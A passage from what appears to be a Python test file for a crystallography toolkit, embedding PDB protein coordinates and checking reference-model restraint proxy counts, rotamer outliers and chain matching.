ATOM 4010 CD GLN C 6 10.314 9.110 28.788 1.00 81.75 C
ATOM 4011 OE1 GLN C 6 9.147 9.195 28.407 1.00 81.75 O
ATOM 4012 NE2 GLN C 6 11.293 8.668 28.008 1.00 81.75 N
ATOM 4015 C GLN C 6 10.108 12.363 30.557 1.00 79.57 C
ATOM 4016 O GLN C 6 10.641 12.760 31.599 1.00 79.57 O
ATOM 4018 N VAL C 7 10.531 12.731 29.349 1.00 79.61 N
ATOM 4019 CA VAL C 7 11.538 13.775 29.192 1.00 79.61 C
ATOM 4021 CB VAL C 7 11.695 14.094 27.694 1.00 78.73 C
ATOM 4023 CG1 VAL C 7 10.350 14.552 27.106 1.00 79.29 C
ATOM 4027 CG2 VAL C 7 12.788 15.133 27.480 1.00 80.51 C
ATOM 4031 C VAL C 7 11.178 15.010 30.006 1.00 79.62 C
ATOM 4032 O VAL C 7 12.062 15.759 30.443 1.00 79.61 O
ATOM 4034 N TYR C 8 9.882 15.234 30.243 1.00 78.80 N
ATOM 4035 CA TYR C 8 9.422 16.321 31.101 1.00 78.80 C
ATOM 4037 CB TYR C 8 7.887 16.311 31.116 1.00 79.05 C
ATOM 4040 CG TYR C 8 7.242 17.382 31.967 1.00 79.05 C
ATOM 4041 CD1 TYR C 8 7.143 18.691 31.510 1.00 79.05 C
ATOM 4043 CE1 TYR C 8 6.548 19.676 32.279 1.00 79.05 C
ATOM 4045 CZ TYR C 8 6.045 19.358 33.521 1.00 79.05 C
ATOM 4046 OH TYR C 8 5.457 20.342 34.283 1.00 79.05 O
ATOM 4048 CE2 TYR C 8 6.125 18.064 33.998 1.00 79.05 C
ATOM 4050 CD2 TYR C 8 6.720 17.084 33.219 1.00 79.05 C
ATOM 4052 C TYR C 8 9.983 16.231 32.521 1.00 78.80 C
ATOM 4053 O TYR C 8 9.801 17.170 33.302 1.00 78.80 O
ATOM 4055 N ALA C 9 10.675 15.139 32.866 1.00 79.52 N
ATOM 4056 CA ALA C 9 11.171 14.948 34.228 1.00 79.52 C
ATOM 4058 CB ALA C 9 12.014 13.674 34.293 1.00 78.34 C
ATOM 4062 C ALA C 9 11.983 16.145 34.702 1.00 79.52 C
ATOM 4063 O ALA C 9 11.793 16.641 35.818 1.00 79.52 O
ATOM 4065 N ASN C 10 12.896 16.627 33.865 1.00 80.25 N
ATOM 4066 CA ASN C 10 13.672 17.797 34.239 1.00 80.25 C
ATOM 4068 CB ASN C 10 14.712 18.063 33.172 1.00 78.17 C
ATOM 4071 CG ASN C 10 15.782 17.007 33.161 1.00 78.17 C
ATOM 4072 OD1 ASN C 10 16.004 16.325 34.166 1.00 78.17 O
ATOM 4073 ND2 ASN C 10 16.442 16.845 32.028 1.00 78.17 N
ATOM 4076 C ASN C 10 12.798 19.015 34.457 1.00 80.25 C
ATOM 4077 O ASN C 10 13.290 20.040 34.941 1.00 80.25 O
TER 174 ASN C 10
ATOM 5959 N THR D 3 60.805 23.774 6.731 1.00 77.43 N
ATOM 5960 CA THR D 3 61.763 22.725 7.191 1.00 77.43 C
ATOM 5962 CB THR D 3 62.603 22.175 6.010 1.00 78.92 C
ATOM 5964 OG1 THR D 3 63.305 23.243 5.360 1.00 78.92 O
ATOM 5966 CG2 THR D 3 61.703 21.469 5.000 1.00 78.92 C
ATOM 5970 C THR D 3 62.675 23.293 8.284 1.00 77.43 C
ATOM 5971 O THR D 3 62.761 24.506 8.443 1.00 77.43 O
ATOM 5975 N GLY D 4 63.363 22.412 9.022 1.00 79.20 N
ATOM 5976 CA GLY D 4 64.130 22.797 10.196 1.00 79.20 C
ATOM 5979 C GLY D 4 63.309 22.788 11.472 1.00 79.20 C
ATOM 5980 O GLY D 4 62.145 22.393 11.509 1.00 79.20 O
ATOM 5982 N ALA D 5 63.950 23.233 12.557 1.00 80.19 N
ATOM 5983 CA ALA D 5 63.257 23.361 13.836 1.00 80.19 C
ATOM 5985 CB ALA D 5 64.211 23.993 14.857 1.00 75.84 C
ATOM 5989 C ALA D 5 61.970 24.181 13.714 1.00 80.19 C
ATOM 5990 O ALA D 5 60.999 23.931 14.438 1.00 80.19 O
ATOM 5992 N GLN D 6 61.942 25.142 12.784 1.00 78.97 N
ATOM 5993 CA GLN D 6 60.843 26.092 12.591 1.00 78.97 C
ATOM 5995 CB GLN D 6 61.204 27.062 11.469 1.00 80.12 C
ATOM 5998 CG GLN D 6 61.464 26.355 10.144 1.00 80.12 C
ATOM 6001 CD GLN D 6 61.853 27.306 9.032 1.00 80.12 C
ATOM 6002 OE1 GLN D 6 62.179 28.464 9.288 1.00 80.12 O
ATOM 6003 NE2 GLN D 6 61.851 26.812 7.790 1.00 80.12 N
ATOM 6006 C GLN D 6 59.510 25.447 12.245 1.00 78.96 C
ATOM 6007 O GLN D 6 58.509 26.166 12.139 1.00 78.96 O
ATOM 6009 N VAL D 7 59.474 24.140 11.995 1.00 78.86 N
ATOM 6010 CA VAL D 7 58.194 23.449 11.865 1.00 78.86 C
ATOM 6012 CB VAL D 7 58.425 21.993 11.421 1.00 81.21 C
ATOM 6014 CG1 VAL D 7 58.877 21.975 9.986 1.00 81.21 C
ATOM 6018 CG2 VAL D 7 59.474 21.288 12.321 1.00 81.21 C
ATOM 6022 C VAL D 7 57.423 23.523 13.168 1.00 78.86 C
ATOM 6023 O VAL D 7 56.190 23.411 13.186 1.00 78.86 O
ATOM 6025 N TYR D 8 58.138 23.697 14.277 1.00 79.34 N
ATOM 6026 CA TYR D 8 57.515 23.918 15.568 1.00 79.34 C
ATOM 6028 CB TYR D 8 58.584 23.823 16.649 1.00 79.01 C
ATOM 6031 CG TYR D 8 58.096 24.160 18.024 1.00 79.01 C
ATOM 6032 CD1 TYR D 8 57.220 23.317 18.688 1.00 79.01 C
ATOM 6034 CE1 TYR D 8 56.778 23.608 19.947 1.00 79.01 C
ATOM 6036 CZ TYR D 8 57.227 24.739 20.578 1.00 79.01 C
ATOM 6037 OH TYR D 8 56.779 25.015 21.845 1.00 79.01 O
ATOM 6039 CE2 TYR D 8 58.111 25.590 19.948 1.00 79.01 C
ATOM 6041 CD2 TYR D 8 58.544 25.294 18.680 1.00 79.01 C
ATOM 6043 C TYR D 8 56.807 25.258 15.636 1.00 79.34 C
ATOM 6044 O TYR D 8 55.950 25.447 16.505 1.00 79.34 O
ATOM 6046 N ALA D 9 57.137 26.174 14.730 1.00 78.81 N
ATOM 6047 CA ALA D 9 56.591 27.522 14.741 1.00 78.81 C
ATOM 6049 CB ALA D 9 56.758 28.183 13.374 1.00 79.37 C
ATOM 6053 C ALA D 9 55.127 27.498 15.121 1.00 78.81 C
ATOM 6054 O ALA D 9 54.764 27.896 16.226 1.00 78.81 O
ATOM 6056 N ASN D 10 54.284 26.983 14.233 1.00 80.12 N
ATOM 6057 CA ASN D 10 52.848 27.017 14.467 1.00 80.13 C
ATOM 6059 CB ASN D 10 52.140 26.402 13.274 1.00 80.26 C
ATOM 6062 CG ASN D 10 52.645 25.031 12.969 1.00 80.26 C
ATOM 6063 OD1 ASN D 10 53.101 24.311 13.860 1.00 80.26 O
ATOM 6064 ND2 ASN D 10 52.586 24.655 11.705 1.00 80.26 N
ATOM 6067 C ASN D 10 52.420 26.314 15.753 1.00 80.14 C
ATOM 6068 O ASN D 10 51.225 26.333 16.068 1.00 80.16 O
TER 232 ASN D 10
END
"""
pdb_str_ref_minimized = """\
CRYST1 69.211 49.956 52.557 90.00 90.00 90.00 P 1
SCALE1 0.014449 0.000000 0.000000 0.00000
SCALE2 0.000000 0.020018 0.000000 0.00000
SCALE3 0.000000 0.000000 0.019027 0.00000
ATOM 1 N THR A 3 50.767 43.905 24.734 1.00 80.52 N
ATOM 2 CA THR A 3 50.582 43.115 23.523 1.00 80.52 C
ATOM 4 CB THR A 3 49.583 41.964 23.746 1.00 79.62 C
ATOM 6 OG1 THR A 3 49.442 41.209 22.536 1.00 79.62 O
ATOM 8 CG2 THR A 3 48.225 42.510 24.160 1.00 79.62 C
ATOM 12 C THR A 3 50.093 43.985 22.370 1.00 80.52 C
ATOM 13 O THR A 3 49.756 45.154 22.562 1.00 80.52 O
ATOM 17 N GLY A 4 50.055 43.408 21.174 1.00 79.31 N
ATOM 18 CA GLY A 4 49.609 44.126 19.994 1.00 79.31 C
ATOM 21 C GLY A 4 49.582 43.269 18.744 1.00 79.31 C
ATOM 22 O GLY A 4 48.530 43.075 18.136 1.00 79.31 O
ATOM 24 N ALA A 5 50.746 42.754 18.361 1.00 78.81 N
ATOM 25 CA ALA A 5 50.858 41.913 17.175 1.00 78.81 C
ATOM 27 CB ALA A 5 51.904 42.473 16.224 1.00 77.40 C
ATOM 31 C ALA A 5 51.199 40.476 17.556 1.00 78.81 C
ATOM 32 O ALA A 5 51.983 39.814 16.877 1.00 78.81 O
ATOM 34 N GLN A 6 50.604 40.001 18.645 1.00 80.55 N
ATOM 35 CA GLN A 6 50.843 38.643 19.118 1.00 80.55 C
ATOM 37 CB GLN A 6 51.379 38.655 20.554 1.00 79.84 C
ATOM 40 CG GLN A 6 52.763 39.273 20.711 1.00 79.84 C
ATOM 43 CD GLN A 6 52.740 40.791 20.698 1.00 79.84 C
ATOM 44 OE1 GLN A 6 51.676 41.408 20.641 1.00 79.84 O
ATOM 45 NE2 GLN A 6 53.919 41.400 20.750 1.00 79.84 N
ATOM 48 C GLN A 6 49.570 37.807 19.041 1.00 80.55 C
ATOM 49 O GLN A 6 49.417 36.823 19.765 1.00 80.55 O
ATOM 51 N VAL A 7 48.660 38.205 18.158 1.00 79.06 N
ATOM 52 CA VAL A 7 47.399 37.495 17.985 1.00 79.06 C
ATOM 54 CB VAL A 7 46.201 38.453 18.098 1.00 78.99 C
ATOM 56 CG1 VAL A 7 44.896 37.694 17.913 1.00 78.99 C
ATOM 60 CG2 VAL A 7 46.222 39.173 19.437 1.00 78.99 C
ATOM 64 C VAL A 7 47.382 36.766 16.647 1.00 79.06 C
ATOM 65 O VAL A 7 47.123 35.564 16.586 1.00 79.06 O
ATOM 67 N TYR A 8 47.661 37.501 15.575 1.00 79.78 N
ATOM 68 CA TYR A 8 47.677 36.928 14.235 1.00 79.78 C
ATOM 70 CB TYR A 8 47.601 38.032 13.178 1.00 77.69 C
ATOM 73 CG TYR A 8 47.544 37.522 11.755 1.00 77.69 C
ATOM 74 CD1 TYR A 8 46.344 37.106 11.194 1.00 77.69 C
ATOM 76 CE1 TYR A 8 46.286 36.641 9.894 1.00 77.69 C
ATOM 78 CZ TYR A 8 47.437 36.589 9.136 1.00 77.69 C
ATOM 79 OH TYR A 8 47.384 36.126 7.842 1.00 77.69 O
ATOM 81 CE2 TYR A 8 48.641 36.998 9.670 1.00 77.69 C
ATOM 83 CD2 TYR A 8 48.689 37.462 10.971 1.00 77.69 C
ATOM 85 C TYR A 8 48.925 36.077 14.022 1.00 79.78 C
ATOM 86 O TYR A 8 48.903 35.104 13.267 1.00 79.78 O
ATOM 88 N ALA A 9 50.010 36.450 14.691 1.00 79.03 N
ATOM 89 CA ALA A 9 51.269 35.722 14.577 1.00 79.02 C
ATOM 91 CB ALA A 9 52.423 36.578 15.075 1.00 79.18 C
ATOM 95 C ALA A 9 51.210 34.407 15.346 1.00 79.02 C
ATOM 96 O ALA A 9 51.871 33.434 14.982 1.00 79.02 O
ATOM 98 N ASN A 10 50.416 34.384 16.411 1.00 79.63 N
ATOM 99 CA ASN A 10 50.270 33.188 17.233 1.00 79.63 C
ATOM 101 CB ASN A 10 50.147 33.564 18.711 1.00 78.91 C
ATOM 104 CG ASN A 10 51.365 34.304 19.227 1.00 78.91 C
ATOM 105 OD1 ASN A 10 52.472 34.134 18.716 1.00 78.91 O
ATOM 106 ND2 ASN A 10 51.167 35.132 20.246 1.00 78.91 N
ATOM 109 C ASN A 10 49.059 32.369 16.797 1.00 79.63 C
ATOM 110 O ASN A 10 49.101 31.139 16.787 1.00 79.63 O
TER
"""
ref_file = open("ref.pdb", 'w')
ref_file.write(pdb_str_ref_minimized)
ref_file.close()
log = cStringIO.StringIO()
# log = sys.stdout
# orig_file = open("start.pdb", "w")
# orig_file.write(pdb_str_original)
# orig_file.close()
def_pars = reference_model_params
params_text = """\
reference_model {
reference_group {
reference = chain 'A'
selection = chain 'A'
file_name = "ref.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'B'
file_name = "ref.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'C'
file_name = "ref.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'D'
file_name = "ref.pdb"
}
} """
pars = iotbx.phil.parse(params_text)
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
rm = reference_model(
model = model,
reference_file_list=['ref.pdb'],
params=all_pars.reference_model,
log=log)
# rm.show_reference_summary(log=log)
assert rm.get_n_proxies() == 124, \
"Expecting 124 proxies, got %d" % rm.get_n_proxies()
# STOP()
new_h = pdb_h.deep_copy()
xray_structure = new_h.extract_xray_structure()
rm.set_rotamer_to_reference(
xray_structure=xray_structure)
new_h.adopt_xray_structure(xray_structure)
r1 = rotalyze(pdb_hierarchy=new_h, outliers_only=False)
assert r1.n_outliers == 0
# new_h.write_pdb_file(file_name="final.pdb")
#
# The same, but from multiple files
for i in range(4):
ref_file = open("ref_%d.pdb" % i, 'w')
ref_file.write(pdb_str_ref_minimized)
ref_file.close()
def_pars = reference_model_params
params_text = """\
reference_model {
file = ref_0.pdb
file = ref_1.pdb
file = ref_2.pdb
file = ref_3.pdb
reference_group {
reference = chain 'A'
selection = chain 'A'
file_name = "ref_0.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'B'
file_name = "ref_1.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'C'
file_name = "ref_2.pdb"
}
reference_group {
reference = chain 'A'
selection = chain 'D'
file_name = "ref_3.pdb"
}
} """
pars = iotbx.phil.parse(params_text)
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
rm = reference_model(
model=model,
reference_file_list=['ref_0.pdb', 'ref_1.pdb', 'ref_2.pdb', 'ref_3.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 124, \
"Expecting 124 proxies, got %d" % rm.get_n_proxies()
for i in range(4):
os.remove("ref_%d.pdb" % i)
#
# The same, 1 group, should be 116/4=29 proxies
ref_file = open("ref_0.pdb", 'w')
ref_file.write(pdb_str_ref_minimized)
ref_file.close()
def_pars = reference_model_params
params_text = """\
reference_model {
file = ref_0.pdb
reference_group {
reference = chain 'A'
selection = chain 'A'
file_name = "ref_0.pdb"
}
} """
pars = iotbx.phil.parse(params_text)
all_pars = def_pars.fetch(pars).extract()
all_pars.reference_model.enabled = True
rm = reference_model(
model=model,
reference_file_list=['ref_0.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 31, \
"Expecting 31 proxies, got %d" % rm.get_n_proxies()
all_pars.reference_model.side_chain=False
rm = reference_model(
model=model,
reference_file_list=['ref_0.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 21, \
"Expecting 21 proxies, got %d" % rm.get_n_proxies()
all_pars.reference_model.side_chain=True
all_pars.reference_model.main_chain=False
rm = reference_model(
model=model,
reference_file_list=['ref_0.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 10, \
"Expecting 10 proxies, got %d" % rm.get_n_proxies()
# just throw all in without specifying:
all_pars = def_pars.fetch().extract()
all_pars.reference_model.enabled = True
all_pars.reference_model.file = 'ref_0.pdb'
rm = reference_model(
model=model,
reference_file_list=['ref_0.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 124, \
"Expecting 124 proxies, got %d" % rm.get_n_proxies()
os.remove("ref_0.pdb")
# reference on self and make sure it is chains A<->A, B<->B etc
log = cStringIO.StringIO()
def_pars = reference_model_params
all_pars = def_pars.fetch().extract()
all_pars.reference_model.enabled = True
all_pars.reference_model.use_starting_model_as_reference = True
rm = reference_model(
model=model,
reference_hierarchy_list=\
[model.get_hierarchy()],
params=all_pars.reference_model,
log=log)
rm.show_reference_summary(log=log)
log_strings = log.getvalue().split("\n")
# print rm.get_n_proxies()
# print "=========="
# print "\n".join(log_strings)
# print "=========="
assert rm.get_n_proxies() == 124, \
"Expecting 124 proxies, got %d" % rm.get_n_proxies()
for needed_string in [
"GLN A 6 <=====> GLN A 6",
"ALA A 9 <=====> ALA A 9",
"ASN A 10 <=====> ASN A 10",
"THR B 3 <=====> THR B 3",
"GLN B 6 <=====> GLN B 6",
"ALA B 9 <=====> ALA B 9",
"ASN B 10 <=====> ASN B 10",
"THR C 3 <=====> THR C 3",
"GLN C 6 <=====> GLN C 6",
"ALA D 5 <=====> ALA D 5",
"GLN D 6 <=====> GLN D 6",
]:
assert needed_string in log_strings, "'%s' not in log!" % needed_string
def exercise_multiple_ncs_groups_found(mon_lib_srv, ener_lib):
pdb_str_original = """\
CRYST1 49.945 53.842 33.425 90.00 90.00 90.00 P 1
ATOM 5466 N ASN C 236 9.580 47.176 25.356 1.00 60.13 N
ATOM 5467 CA ASN C 236 8.200 46.668 25.442 1.00 60.52 C
ATOM 5468 C ASN C 236 8.058 45.158 25.655 1.00 60.49 C
ATOM 5469 O ASN C 236 7.110 44.527 25.191 1.00 60.60 O
ATOM 5470 CB ASN C 236 7.370 47.129 24.244 1.00 60.55 C
ATOM 5471 CG ASN C 236 6.038 47.680 24.666 1.00 61.75 C
ATOM 5472 OD1 ASN C 236 5.937 48.842 25.096 1.00 62.86 O
ATOM 5473 ND2 ASN C 236 5.000 46.849 24.575 1.00 61.22 N
ATOM 5474 N LEU C 237 8.997 44.597 26.396 1.00 60.55 N
ATOM 5475 CA LEU C 237 9.125 43.164 26.494 1.00 60.48 C
ATOM 5476 C LEU C 237 9.496 42.788 27.909 1.00 60.06 C
ATOM 5477 O LEU C 237 9.016 41.780 28.425 1.00 60.41 O
ATOM 5478 CB LEU C 237 10.199 42.697 25.506 1.00 60.91 C
ATOM 5479 CG LEU C 237 10.223 41.328 24.819 1.00 62.25 C
ATOM 5480 CD1 LEU C 237 9.088 40.386 25.251 1.00 63.18 C
ATOM 5481 CD2 LEU C 237 10.244 41.542 23.293 1.00 62.89 C
TER
ATOM 1 N THR A 3 42.874 19.189 20.321 1.00 80.52 N
ATOM 2 CA THR A 3 42.493 17.965 19.539 1.00 80.52 C
ATOM 4 CB THR A 3 42.127 16.792 20.509 1.00 79.62 C
ATOM 6 OG1 THR A 3 41.887 15.591 19.761 1.00 79.62 O
ATOM 8 CG2 THR A 3 40.920 17.121 21.394 1.00 79.62 C
ATOM 12 C THR A 3 41.338 18.247 18.549 1.00 80.52 C
ATOM 13 O THR A 3 40.201 18.456 18.959 1.00 80.52 O
ATOM 17 N GLY A 4 41.644 18.246 17.245 1.00 79.31 N
ATOM 18 CA GLY A 4 40.711 18.691 16.220 1.00 79.31 C
ATOM 21 C GLY A 4 40.442 17.713 15.089 1.00 79.31 C
ATOM 22 O GLY A 4 39.471 16.958 15.136 1.00 79.31 O
ATOM 24 N ALA A 5 41.262 17.732 14.043 1.00 78.81 N
ATOM 25 CA ALA A 5 41.076 16.837 12.909 1.00 78.81 C
ATOM 27 CB ALA A 5 41.455 17.547 11.611 1.00 77.40 C
ATOM 31 C ALA A 5 41.876 15.548 13.042 1.00 78.81 C
ATOM 32 O ALA A 5 41.939 14.770 12.085 1.00 78.81 O
ATOM 34 N GLN A 6 42.497 15.306 14.200 1.00 80.55 N
ATOM 35 CA GLN A 6 43.323 14.113 14.346 1.00 80.55 C
ATOM 37 CB GLN A 6 44.064 14.112 15.682 1.00 79.84 C
ATOM 40 CG GLN A 6 44.945 15.305 15.924 1.00 79.84 C
ATOM 43 CD GLN A 6 44.171 16.444 16.553 1.00 79.84 C
ATOM 44 OE1 GLN A 6 42.971 16.324 16.817 1.00 79.84 O
ATOM 45 NE2 GLN A 6 44.848 17.558 16.796 1.00 79.84 N
ATOM 48 C GLN A 6 42.469 12.864 14.273 1.00 80.55 C
ATOM 49 O GLN A 6 42.829 11.892 13.601 1.00 80.55 O
ATOM 51 N VAL A 7 41.324 12.884 14.959 1.00 79.06 N
ATOM 52 CA VAL A 7 40.503 11.693 15.123 1.00 79.06 C
ATOM 54 CB VAL A 7 39.291 12.027 16.016 1.00 78.99 C
ATOM 56 CG1 VAL A 7 38.330 10.839 16.122 1.00 78.99 C
ATOM 60 CG2 VAL A 7 39.756 12.478 17.391 1.00 78.99 C
ATOM 64 C VAL A 7 40.080 11.140 13.778 1.00 79.06 C
ATOM 65 O VAL A 7 39.643 9.988 13.688 1.00 79.06 O
ATOM 67 N TYR A 8 40.219 11.933 12.718 1.00 79.78 N
ATOM 68 CA TYR A 8 40.126 11.380 11.379 1.00 79.78 C
ATOM 70 CB TYR A 8 40.413 12.461 10.342 1.00 77.69 C
ATOM 73 CG TYR A 8 40.315 11.969 8.911 1.00 77.69 C
ATOM 74 CD1 TYR A 8 39.085 11.871 8.272 1.00 77.69 C
ATOM 76 CE1 TYR A 8 38.989 11.420 6.968 1.00 77.69 C
ATOM 78 CZ TYR A 8 40.125 11.035 6.294 1.00 77.69 C
ATOM 79 OH TYR A 8 40.036 10.581 5.000 1.00 77.69 O
ATOM 81 CE2 TYR A 8 41.353 11.105 6.908 1.00 77.69 C
ATOM 83 CD2 TYR A 8 41.444 11.566 8.211 1.00 77.69 C
ATOM 85 C TYR A 8 41.097 10.224 11.185 1.00 79.78 C
ATOM 86 O TYR A 8 40.883 9.397 10.295 1.00 79.78 O
ATOM 88 N ALA A 9 42.156 10.145 11.999 1.00 79.03 N
ATOM 89 CA ALA A 9 43.144 9.077 11.874 1.00 79.02 C
ATOM 91 CB ALA A 9 44.125 9.129 13.047 1.00 79.18 C
ATOM 95 C ALA A 9 42.514 7.692 11.812 1.00 79.02 C
ATOM 96 O ALA A 9 43.151 6.757 11.310 1.00 79.02 O
ATOM 98 N ASN A 10 41.292 7.531 12.330 1.00 79.63 N
ATOM 99 CA ASN A 10 40.571 6.269 12.224 1.00 79.63 C
ATOM 101 CB ASN A 10 39.519 6.171 13.330 1.00 78.91 C
ATOM 104 CG ASN A 10 40.136 6.118 14.715 1.00 78.91 C
ATOM 105 OD1 ASN A 10 41.317 5.836 14.855 1.00 78.91 O
ATOM 106 ND2 ASN A 10 39.329 6.346 15.746 1.00 78.91 N
ATOM 109 C ASN A 10 39.894 6.092 10.871 1.00 79.63 C
ATOM 110 O ASN A 10 39.405 5.000 10.574 1.00 79.63 O
TER
END
"""
pdb_str_ref = """\
CRYST1 49.945 53.842 33.425 90.00 90.00 90.00 P 1
ATOM 5466 N ASN C 236 10.328 45.698 25.449 1.00 60.13 N
ATOM 5467 CA ASN C 236 8.971 45.973 25.787 1.00 60.52 C
ATOM 5468 C ASN C 236 8.271 44.664 25.724 1.00 60.49 C
ATOM 5469 O ASN C 236 7.276 44.532 25.017 1.00 60.60 O
ATOM 5470 CB ASN C 236 8.337 46.962 24.776 1.00 60.55 C
ATOM 5471 CG ASN C 236 7.235 47.762 25.415 1.00 61.75 C
ATOM 5472 OD1 ASN C 236 6.331 47.222 26.063 1.00 62.86 O
ATOM 5473 ND2 ASN C 236 7.315 49.079 25.302 1.00 61.22 N
ATOM 5474 N LEU C 237 8.820 43.663 26.441 1.00 60.55 N
ATOM 5475 CA LEU C 237 8.420 42.305 26.286 1.00 60.48 C
ATOM 5476 C LEU C 237 8.713 41.508 27.558 1.00 60.06 C
ATOM 5477 O LEU C 237 7.907 41.421 28.503 1.00 60.41 O
ATOM 5478 CB LEU C 237 9.159 41.598 25.114 1.00 60.91 C
ATOM 5479 CG LEU C 237 9.365 42.136 23.662 1.00 62.25 C
ATOM 5480 CD1 LEU C 237 10.605 42.996 23.496 1.00 63.18 C
ATOM 5481 CD2 LEU C 237 9.419 40.966 22.765 1.00 62.89 C
TER
ATOM 1 N THR A 3 40.527 19.363 20.612 1.00 80.52 N
ATOM 2 CA THR A 3 41.278 18.625 19.636 1.00 80.52 C
ATOM 4 CB THR A 3 40.971 17.090 19.710 1.00 79.62 C
ATOM 6 OG1 THR A 3 40.039 16.849 20.760 1.00 79.62 O
ATOM 8 CG2 THR A 3 42.308 16.246 19.999 1.00 79.62 C
ATOM 12 C THR A 3 40.899 19.134 18.229 1.00 80.52 C
ATOM 13 O THR A 3 39.780 19.542 17.983 1.00 80.52 O
ATOM 17 N GLY A 4 41.890 19.246 17.384 1.00 79.31 N
ATOM 18 CA GLY A 4 41.732 19.850 16.092 1.00 79.31 C
ATOM 21 C GLY A 4 41.306 18.930 14.985 1.00 79.31 C
ATOM 22 O GLY A 4 40.121 18.885 14.657 1.00 79.31 O
ATOM 24 N ALA A 5 42.279 18.233 14.402 1.00 78.81 N
ATOM 25 CA ALA A 5 41.969 17.264 13.392 1.00 78.81 C
ATOM 27 CB ALA A 5 42.474 17.741 12.001 1.00 77.40 C
ATOM 31 C ALA A 5 42.643 15.914 13.751 1.00 78.81 C
ATOM 32 O ALA A 5 43.503 15.474 12.983 1.00 78.81 O
ATOM 34 N GLN A 6 42.216 15.310 14.835 1.00 80.55 N
ATOM 35 CA GLN A 6 42.871 14.115 15.363 1.00 80.55 C
ATOM 37 CB GLN A 6 43.590 14.383 16.698 1.00 79.84 C
ATOM 40 CG GLN A 6 44.888 15.121 16.536 1.00 79.84 C
ATOM 43 CD GLN A 6 44.671 16.613 16.295 1.00 79.84 C
ATOM 44 OE1 GLN A 6 44.164 17.330 17.155 1.00 79.84 O
ATOM 45 NE2 GLN A 6 45.100 17.105 15.149 1.00 79.84 N
ATOM 48 C GLN A 6 41.888 12.972 15.564 1.00 80.55 C
ATOM 49 O GLN A 6 42.024 12.228 16.514 1.00 80.55 O
ATOM 51 N VAL A 7 40.933 12.858 14.656 1.00 79.06 N
ATOM 52 CA VAL A 7 40.101 11.677 14.619 1.00 79.06 C
ATOM 54 CB VAL A 7 38.947 11.709 15.573 1.00 78.99 C
ATOM 56 CG1 VAL A 7 39.330 11.128 16.941 1.00 78.99 C
ATOM 60 CG2 VAL A 7 38.334 13.128 15.699 1.00 78.99 C
ATOM 64 C VAL A 7 39.594 11.421 13.214 1.00 79.06 C
ATOM 65 O VAL A 7 38.407 11.279 12.954 1.00 79.06 O
ATOM 67 N TYR A 8 40.568 11.433 12.304 1.00 79.78 N
ATOM 68 CA TYR A 8 40.360 10.983 10.905 1.00 79.78 C
ATOM 70 CB TYR A 8 40.783 12.069 9.904 1.00 77.69 C
ATOM 73 CG TYR A 8 40.349 11.670 8.527 1.00 77.69 C
ATOM 74 CD1 TYR A 8 39.008 11.604 8.192 1.00 77.69 C
ATOM 76 CE1 TYR A 8 38.600 11.184 6.931 1.00 77.69 C
ATOM 78 CZ TYR A 8 39.528 10.864 5.979 1.00 77.69 C
ATOM 79 OH TYR A 8 39.195 10.466 4.696 1.00 77.69 O
ATOM 81 CE2 TYR A 8 40.880 10.918 6.304 1.00 77.69 C
ATOM 83 CD2 TYR A 8 41.286 11.303 7.563 1.00 77.69 C
ATOM 85 C TYR A 8 41.107 9.702 10.624 1.00 79.78 C
ATOM 86 O TYR A 8 40.892 9.064 9.584 1.00 79.78 O
ATOM 88 N ALA A 9 42.003 9.312 11.526 1.00 79.03 N
ATOM 89 CA ALA A 9 42.888 8.166 11.317 1.00 79.02 C
ATOM 91 CB ALA A 9 44.052 8.246 12.231 1.00 79.18 C
ATOM 95 C ALA A 9 42.102 6.856 11.504 1.00 79.02 C
ATOM 96 O ALA A 9 42.154 5.981 10.647 1.00 79.02 O
ATOM 98 N ASN A 10 41.404 6.751 12.642 1.00 79.63 N
ATOM 99 CA ASN A 10 40.465 5.684 12.913 1.00 79.63 C
ATOM 101 CB ASN A 10 39.947 5.766 14.373 1.00 78.91 C
ATOM 104 CG ASN A 10 41.037 5.501 15.391 1.00 78.91 C
ATOM 105 OD1 ASN A 10 42.073 4.895 15.058 1.00 78.91 O
ATOM 106 ND2 ASN A 10 40.820 5.957 16.635 1.00 78.91 N
ATOM 109 C ASN A 10 39.283 5.748 11.958 1.00 79.63 C
ATOM 110 O ASN A 10 39.365 5.382 10.797 1.00 79.63 O
TER
"""
ref_file = open("ref.pdb", 'w')
ref_file.write(pdb_str_ref)
ref_file.close()
log = cStringIO.StringIO()
# log = sys.stdout
def_pars = reference_model_params
all_pars = def_pars.fetch().extract()
all_pars.reference_model.file = 'ref.pdb'
all_pars.reference_model.enabled = True
model = mmtbx.model.manager(
model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
source_info=None),
process_input=True)
pdb_h = model.get_hierarchy()
rm = reference_model(
model=model,
reference_file_list=['ref.pdb'],
params=all_pars.reference_model,
log=log)
assert rm.get_n_proxies() == 36, \
"Expecting 36 proxies, got %d" % rm.get_n_proxies()
os.remove("ref.pdb")
def exercise_cutted_residue(mon_lib_srv, ener_lib):
pdb_str_original = """\
CRYST1 117.739 195.224 119.094 90.00 101.60 90.00 P 1 21 1
ATOM 6368 N THR K 332 4.163 72.088 52.141 1.00171.28 N
ATOM 6369 CA THR K 332 2.830 71.741 52.608 1.00153.71 C
ATOM 6370 C THR K 332 1.990 70.958 51.609 1.00132.45 C
ATOM 6371 O THR K 332 2.224 71.000 50.405 1.00130.38 O
ATOM 6372 CB THR K 332 2.047 72.996 53.035 1.00155.45 C
ATOM 6373 N VAL K 333 1.006 70.246 52.144 1.00121.58 N
ATOM 6374 CA VAL K 333 0.085 69.440 51.360 1.00129.11 C
ATOM 6375 C VAL K 333 -1.326 69.771 51.818 1.00146.57 C
ATOM 6376 O VAL K 333 -1.517 70.242 52.935 1.00151.92 O
